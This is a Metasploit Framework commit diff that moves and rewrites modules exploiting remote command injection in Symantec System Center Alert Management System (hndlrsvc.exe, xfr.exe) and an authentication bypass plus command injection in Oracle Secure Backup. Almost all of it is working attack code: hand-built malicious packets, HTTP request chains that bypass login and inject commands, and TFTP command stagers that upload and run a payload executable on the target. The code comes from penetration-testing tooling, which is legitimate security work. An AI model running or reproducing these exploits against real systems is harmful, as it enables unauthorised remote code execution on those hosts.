working on moving things referenced in Feature #653. added different param for secure backup

git-svn-id: file:///home/svn/framework3/trunk@13591 4d416f70-5f16-0410-b530-b9f4589650da
2011-08-19 18:35:29 +00:00 · 2011-08-19 18:35:29 +00:00 · aef764de08
parent fe53151324
commit aef764de08
5 changed files with 425 additions and 211 deletions
--- a/modules/auxiliary/admin/symantec/ams_hndlrsvc.rb
+++ b/modules/auxiliary/admin/symantec/ams_hndlrsvc.rb
@ -1,136 +0,0 @@
-##
-# $Id$
-##
-
-##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
-##
-
-require 'msf/core'
-
-class Metasploit3 < Msf::Auxiliary
-
-	Rank = ExcellentRanking
-
-	include Msf::Exploit::Remote::Tcp
-
-	def initialize(info = {})
-		super(update_info(info,
-			'Name'           => 'Symantec System Center Alert Management System (hndlrsvc.exe) Arbitrary Command Execution',
-			'Description'    => %q{
-					Symantec System Center Alert Management System is prone to a remote command-injection vulnerability
-				because the application fails to properly sanitize user-supplied input.
-			},
-			'Author'         => [ 'MC' ],
-			'License'        => MSF_LICENSE,
-			'Version'        => '$Revision$',
-			'References'     =>
-				[
-					[ 'OSVDB', '66807'],
-					[ 'BID', '41959' ],
-					[ 'URL', 'http://www.foofus.net/~spider/code/AMS2_072610.txt' ],
-				],
-			'DisclosureDate' => 'Jul 26 2010'))
-
-		register_options(
-			[
-				Opt::RPORT(38292),
-				OptString.new('CMD', [ false, 'The OS command to execute',
-					'cmd.exe /c echo metasploit > %SYSTEMDRIVE%\\metasploit.txt']),
-			], self.class)
-	end
-
-	def run
-		begin
-			connect
-
-			cmd = datastore['CMD']
-
-			if ( cmd.length > 128 )
-				raise RuntimeError,"Command strings greater then 128 characters will not be processed!"
-			end
-
-			string_uno  = Rex::Text.rand_text_alpha_upper(11)
-			string_dos  = Rex::Text.rand_text_alpha_upper(rand(4) + 5)
-
-			packet =  "\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00"
-			packet << "\x02\x00\x95\x94\xc0\xa8\x02\x64\x00\x00\x00\x00\x00\x00\x00\x00"
-			packet << "\xe8\x03\x00\x00"
-			packet << 'PRGXCNFG'
-			packet << "\x10\x00\x00\x00"
-			packet << "\x00\x00\x00\x00\x04"
-			packet << 'ALHD\F'
-			packet << "\x00\x00\x01\x00\x00"
-			packet << "\x00\x01\x00\x0e\x00"
-			packet << 'Risk Repaired'
-			packet << "\x00\x25\x00"
-			packet << 'Symantec Antivirus Corporate Edition'
-			packet << "\x00\xf9\x1d\x13\x4a\x3f"
-			packet << [string_uno.length + 1].pack('v') + string_uno
-			packet << "\x00\x08\x08\x0a"
-			packet << "\x00" + 'Risk Name'
-			packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
-			packet << "\x00" + string_dos
-			packet << "\x00\x08\x0a\x00"
-			packet << 'File Path'
-			packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
-			packet << "\x00" + string_dos
-			packet << "\x00\x08\x11\x00"
-			packet << 'Requested Action'
-			packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
-			packet << "\x00" + string_dos
-			packet << "\x00\x08\x0e\x00"
-			packet << 'Actual Action'
-			packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
-			packet << "\x00" + string_dos
-			packet << "\x00\x08\x07\x00"
-			packet << 'Logger'
-			packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
-			packet << "\x00" + string_dos
-			packet << "\x00\x08\x05\x00"
-			packet << 'User'
-			packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
-			packet << "\x00" + string_dos
-			packet << "\x00\x08\x09\x00"
-			packet << 'Hostname'
-			packet << "\x00\x0e\x00" + [string_uno.length + 1].pack('v') + string_uno
-			packet << "\x00\x08\x13\x00"
-			packet << 'Corrective Actions'
-			packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
-			packet << "\x00" + string_dos
-			packet << "\x00\x00\x07\x08\x12\x00"
-			packet << 'ConfigurationName'
-			packet << [cmd.length + 3].pack('n') + [cmd.length + 1].pack('n')
-			packet << "\x00" + cmd
-			packet << "\x00\x08\x0c\x00"
-			packet << 'CommandLine'
-			packet << [cmd.length + 3].pack('n') + [cmd.length + 1].pack('n')
-			packet << "\x00" + cmd
-			packet << "\x00\x08\x08\x00"
-			packet << 'RunArgs'
-			packet << "\x00\x04\x00\x02\x00"
-			packet << "\x20\x00\x03\x05\x00"
-			packet << 'Mode'
-			packet << "\x00\x04\x00\x02\x00\x00\x00"
-			packet << "\x0a\x0d\x00"
-			packet << 'FormatString'
-			packet << "\x00\x02\x00\x00\x00\x08\x12\x00"
-			packet << 'ConfigurationName'
-			packet << "\x00\x02\x00\x00\x00\x08\x0c\x00"
-			packet << 'HandlerHost'
-			packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
-			packet << "\x00" + string_dos
-			packet << "\x00" * packet.length
-
-			print_status("Sending command: #{datastore['CMD']}")
-			sock.put(packet)
-
-			disconnect
-		rescue ::Exception
-			print_error("Error: #{$!.class} #{$!}")
-		end
-	end
-end
--- a/modules/auxiliary/admin/symantec/ams_xfr.rb
+++ b/modules/auxiliary/admin/symantec/ams_xfr.rb
@ -1,75 +0,0 @@
-##
-# $Id$
-##
-
-##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
-##
-
-require 'msf/core'
-
-class Metasploit3 < Msf::Auxiliary
-
-	Rank = ExcellentRanking
-
-	include Msf::Exploit::Remote::Tcp
-
-	def initialize(info = {})
-		super(update_info(info,
-			'Name'           => 'Symantec System Center Alert Management System (xfr.exe) Arbitrary Command Execution',
-			'Description'    => %q{
-					Symantec System Center Alert Management System is prone to a remote command-injection vulnerability
-					because the application fails to properly sanitize user-supplied input.
-			},
-			'Author'         => [ 'MC' ],
-			'License'        => MSF_LICENSE,
-			'Version'        => '$Revision$',
-			'References'     =>
-				[
-					[ 'CVE', '2009-1429' ],
-					[ 'BID', '34671' ],
-					[ 'OSVDB', '54157' ],
-					[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-09-060/' ],
-					[ 'URL', 'http://www.symantec.com/business/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&suid=20090428_02' ]
-				],
-			'DisclosureDate' => 'Apr 28 2009'))
-
-			register_options(
-				[
-					Opt::RPORT(12174),
-					OptString.new('CMD', [ false, 'The OS command to execute', 'cmd /c echo metasploit > %SYSTEMDRIVE%\metasploit.txt']),
-				], self.class)
-	end
-
-	def run
-		begin
-			connect
-
-				len  = 2 + datastore['CMD'].length
-
-				data =  [0x00000000].pack('V')
-				data << len.chr
-				data << "\x00"
-				data << datastore['CMD'] + " "
-				data << "\x00"
-
-				print_status("Sending command: #{datastore['CMD']}")
-				sock.put(data)
-
-				res = sock.get_once
-
-					if (!res)
-						print_error("Did not recieve data. Failed?")
-					else
-						print_status("Got data, execution successful!")
-					end
-
-				disconnect
-		rescue ::Exception
-		print_error("Error: #{$!.class} #{$!}")
-		end
-	end
-end
--- a/modules/exploits/windows/antivirus/ams_hndlrsvc.rb
+++ b/modules/exploits/windows/antivirus/ams_hndlrsvc.rb
@ -0,0 +1,176 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+
+	Rank = ExcellentRanking
+
+	include Msf::Exploit::CmdStagerTFTP
+	include Msf::Exploit::Remote::Tcp
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Symantec System Center Alert Management System (hndlrsvc.exe) Arbitrary Command Execution',
+			'Description'    => %q{
+					Symantec System Center Alert Management System is prone to a 
+				remote command-injection vulnerability because the application fails 
+				to properly sanitize user-supplied input.
+			},
+			'Author'         => [ 'MC' ],
+			'License'        => MSF_LICENSE,
+			'Version'        => '$Revision$',
+			'References'     =>
+				[
+					[ 'OSVDB', '66807'],
+					[ 'BID', '41959' ],
+					[ 'URL', 'http://www.foofus.net/~spider/code/AMS2_072610.txt' ],
+				],
+			'Targets'       =>
+				[
+					[ 'Windows Universal',
+						{
+							'Arch' => ARCH_X86,
+							'Platform' => 'win'
+						}
+					]
+				],
+			'Privileged' => 'true',
+			'Platform' => 'win',
+			'DefaultTarget' => 0,
+			'DisclosureDate' => 'Jul 26 2010'))
+
+		register_options(
+			[
+				Opt::RPORT(38292),
+				OptString.new('CMD', [ false, 'Execute this command instead of using command stager', ""]), 
+			], self.class)
+	end
+
+	def windows_stager
+
+		exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"
+
+		print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
+		execute_cmdstager({ :temp => '.'})
+		@payload_exe = payload_exe
+
+		print_status("Attempting to execute the payload...")
+		execute_command(@payload_exe)
+
+	end
+
+	def execute_command(cmd, opts = {})
+	
+		connect
+
+		if ( cmd.length > 128 )
+			raise RuntimeError,"Command strings greater then 128 characters will not be processed!"
+		end
+
+		string_uno  = Rex::Text.rand_text_alpha_upper(11)
+		string_dos  = Rex::Text.rand_text_alpha_upper(rand(4) + 5)
+
+		packet =  "\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00"
+		packet << "\x02\x00\x95\x94\xc0\xa8\x02\x64\x00\x00\x00\x00\x00\x00\x00\x00"
+		packet << "\xe8\x03\x00\x00"
+		packet << 'PRGXCNFG'
+		packet << "\x10\x00\x00\x00"
+		packet << "\x00\x00\x00\x00\x04"
+		packet << 'ALHD\F'
+		packet << "\x00\x00\x01\x00\x00"
+		packet << "\x00\x01\x00\x0e\x00"
+		packet << 'Risk Repaired'
+		packet << "\x00\x25\x00"
+		packet << 'Symantec Antivirus Corporate Edition'
+		packet << "\x00\xf9\x1d\x13\x4a\x3f"
+		packet << [string_uno.length + 1].pack('v') + string_uno
+		packet << "\x00\x08\x08\x0a"
+		packet << "\x00" + 'Risk Name'
+		packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
+		packet << "\x00" + string_dos
+		packet << "\x00\x08\x0a\x00"
+		packet << 'File Path'
+		packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
+		packet << "\x00" + string_dos
+		packet << "\x00\x08\x11\x00"
+		packet << 'Requested Action'
+		packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
+		packet << "\x00" + string_dos
+		packet << "\x00\x08\x0e\x00"
+		packet << 'Actual Action'
+		packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
+		packet << "\x00" + string_dos
+		packet << "\x00\x08\x07\x00"
+		packet << 'Logger'
+		packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
+		packet << "\x00" + string_dos
+		packet << "\x00\x08\x05\x00"
+		packet << 'User'
+		packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
+		packet << "\x00" + string_dos
+		packet << "\x00\x08\x09\x00"
+		packet << 'Hostname'
+		packet << "\x00\x0e\x00" + [string_uno.length + 1].pack('v') + string_uno
+		packet << "\x00\x08\x13\x00"
+		packet << 'Corrective Actions'
+		packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
+		packet << "\x00" + string_dos
+		packet << "\x00\x00\x07\x08\x12\x00"
+		packet << 'ConfigurationName'
+		packet << [cmd.length + 3].pack('n') + [cmd.length + 1].pack('n')
+		packet << "\x00" + cmd
+		packet << "\x00\x08\x0c\x00"
+		packet << 'CommandLine'
+		packet << [cmd.length + 3].pack('n') + [cmd.length + 1].pack('n')
+		packet << "\x00" + cmd
+		packet << "\x00\x08\x08\x00"
+		packet << 'RunArgs'
+		packet << "\x00\x04\x00\x02\x00"
+		packet << "\x20\x00\x03\x05\x00"
+		packet << 'Mode'
+		packet << "\x00\x04\x00\x02\x00\x00\x00"
+		packet << "\x0a\x0d\x00"
+		packet << 'FormatString'
+		packet << "\x00\x02\x00\x00\x00\x08\x12\x00"
+		packet << 'ConfigurationName'
+		packet << "\x00\x02\x00\x00\x00\x08\x0c\x00"
+		packet << 'HandlerHost'
+		packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
+		packet << "\x00" + string_dos
+		packet << "\x00" * packet.length
+
+		sock.put(packet)
+	
+		select(nil,nil,nil,3)	
+		disconnect
+	end
+
+	def exploit
+
+		if not datastore['CMD'].empty?
+			print_status("Executing command '#{datastore['CMD']}'")
+			execute_command(datastore['CMD'])
+			return
+		end
+
+		case target['Platform']
+			when 'win'
+				windows_stager
+			else
+				raise RuntimeError, 'Target not supported.'
+			end
+
+		handler
+
+	end
+end
--- a/modules/exploits/windows/antivirus/ams_xfr.rb
+++ b/modules/exploits/windows/antivirus/ams_xfr.rb
@ -0,0 +1,117 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+
+	Rank = ExcellentRanking
+
+	include Msf::Exploit::CmdStagerTFTP
+	include Msf::Exploit::Remote::Tcp
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Symantec System Center Alert Management System (xfr.exe) Arbitrary Command Execution',
+			'Description'    => %q{
+					Symantec System Center Alert Management System is prone to a remote command-injection vulnerability
+					because the application fails to properly sanitize user-supplied input.
+			},
+			'Author'         => [ 'MC' ],
+			'License'        => MSF_LICENSE,
+			'Version'        => '$Revision$',
+			'References'     =>
+				[
+					[ 'CVE', '2009-1429' ],
+					[ 'BID', '34671' ],
+					[ 'OSVDB', '54157' ],
+					[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-09-060/' ],
+					[ 'URL', 'http://www.symantec.com/business/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&suid=20090428_02' ]
+				],
+			'Targets'       =>
+				[
+					[ 'Windows Universal',
+						{
+							'Arch' => ARCH_X86,
+							'Platform' => 'win'
+						}
+					]
+				],
+			'Privileged' => 'true',
+			'Platform' => 'win',
+			'DefaultTarget' => 0,
+			'DisclosureDate' => 'Apr 28 2009'))
+
+		register_options(
+			[
+				Opt::RPORT(12174),
+				OptString.new('CMD', [ false, 'Execute this command instead of using command stager', ""]),
+			], self.class)
+	end
+
+	def windows_stager
+
+		exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"
+
+		print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
+		execute_cmdstager({ :temp => '.'})
+		@payload_exe = payload_exe
+
+		print_status("Attempting to execute the payload...")
+		execute_command(@payload_exe)
+
+	end
+
+	def execute_command(cmd, opts = {})
+
+		connect
+
+			len  = 2 + cmd.length
+
+			data =  [0x00000000].pack('V')
+			data << len.chr
+			data << "\x00"
+			data << cmd + " "
+			data << "\x00"
+
+			sock.put(data)
+
+			res = sock.get_once
+
+				if (!res)
+					print_error("Did not recieve data. Failed?")
+				else
+					print_status("Got data, execution successful!")
+				end
+
+		disconnect
+		
+	end
+
+	def exploit
+
+		if not datastore['CMD'].empty?
+			print_status("Executing command '#{datastore['CMD']}'")
+			execute_command(datastore['CMD'])
+			return
+		end
+
+		case target['Platform']
+			when 'win'
+				windows_stager
+			else
+				raise RuntimeError, 'Target not supported.'
+			end
+
+		handler
+
+	end
+end
--- a/modules/exploits/windows/http/osb_uname_jlist.rb
+++ b/modules/exploits/windows/http/osb_uname_jlist.rb
@ -0,0 +1,132 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = GreatRanking
+
+	include Msf::Exploit::CmdStagerTFTP
+	include Msf::Exploit::Remote::HttpClient
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability',
+			'Description'    => %q{
+					This module exploits an authentication bypass vulnerability
+				in login.php. In conjuction with the authentication bypass issue,
+				the 'jlist' parameter in property_box.php can be used to execute
+				arbitrary system commands.
+				This module was tested against Oracle Secure Backup version 10.3.0.1.0
+			},
+			'Author'         => [ 'MC' ],
+			'License'        => MSF_LICENSE,
+			'Version'        => '$Revision$',
+			'References'     =>
+				[
+					[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-10-118' ],
+					[ 'CVE', '2010-0904' ],
+					# the jlist vector has not been disclosed or has it?
+				],
+			'Targets'	=>
+				[
+					[ 'Windows Universal', 
+						{ 
+							'Arch' => ARCH_X86,
+							'Platform' => 'win'
+						} 
+					]
+				],
+			'Privileged' => 'true',
+			'Platform' => 'win',
+			'DisclosureDate' => 'Jul 13 2010',
+			'DefaultTarget' => 0))
+
+		register_options(
+			[
+				Opt::RPORT(443),
+				OptBool.new('SSL',   [true, 'Use SSL', true]),
+				OptString.new('CMD', [ false, 'Execute this command instead of using command stager', "" ])
+			], self.class)
+	end
+
+	def windows_stager
+
+		exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"
+		
+		print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
+		execute_cmdstager({ :temp => '.'})
+		@payload_exe = payload_exe
+		
+		print_status("Attempting to execute the payload...")
+		execute_command(@payload_exe)
+	
+	end
+
+	def execute_command(cmd, opts = {})
+
+		res = send_request_cgi(
+			{
+				'uri'   =>  '/login.php',
+				'data'  =>  'attempt=1&uname=-',
+				'method' => 'POST',
+			}, 5)
+
+		if (res.headers['Set-Cookie'] and res.headers['Set-Cookie'].match(/PHPSESSID=(.*);(.*)/i))
+			sessionid = res.headers['Set-Cookie'].split(';')[0]
+
+			data = '?type=Job&jlist=0%26' + Rex::Text::uri_encode(cmd)
+		
+			send_request_raw(
+				{
+					'uri'   => '/property_box.php' + data,
+					'cookie' => sessionid,
+					'method' => 'GET',
+				}, 5)
+
+		else
+			print_error("Invalid PHPSESSION token..")
+			return
+		end
+	end
+
+	def exploit
+
+		if not datastore['CMD'].empty?
+			print_status("Executing command '#{datastore['CMD']}'")
+			execute_command(datastore['CMD'])
+			return
+		end
+
+		case target['Platform']
+			when 'win'
+				windows_stager
+			else
+				raise RuntimeError, 'Target not supported.'
+		end
+
+		handler
+	
+	end
+end
+__END__
+  else if (strcmp($type, "Job") == 0)
+    {
+    if (!is_array($objectname))
+      $objectname = array();
+    reset($objectname);
+    while (list(,$oname) = each($objectname))
+      {
+      $oname = escapeshellarg($oname);
+      $jlist = "$jlist $oname";
+      }
+    if (strlen($jlist) > 0)
+      $msg = exec_qr("$rbtool lsjob -lrRLC $jlist");